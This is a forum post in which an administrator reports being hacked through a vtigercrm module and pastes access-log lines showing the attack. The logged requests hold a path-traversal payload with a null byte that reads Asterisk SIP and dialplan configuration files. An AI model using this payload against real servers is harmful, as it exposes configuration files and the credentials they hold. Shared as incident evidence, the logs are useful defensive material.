Just wanna share my experience. I didn't restrict access through the web, so I have been hacked through some vtigercrm module.
This is how they got config file when server was overloaded by DDOS attack:
- Code: Select all
12.237.27.3 - - [17/Jul/2012:05:58:10 -0400] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../..etc/asterisk/sip.conf%00 HTTP/1.1" 200 6780 "-" "curl/7.15.5 (i686-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5"
12.237.27.3 - - [17/Jul/2012:05:58:10 -0400] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../..etc/asterisk/sip-vicidial.conf%00 HTTP/1.1" 200 6730 "-" "curl/7.15.5 (i686-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/06.5"
12.237.27.3 - - [17/Jul/2012:05:58:11 -0400] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../..etc/asterisk/extensions.conf%00 HTTP/1.1" 200 25732 "-" "curl/7.15.5 (i686-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0..5"
I dont even know how they get 200(ok) response. I've tried to retrieve this URL by myself, and I always receive 500(error)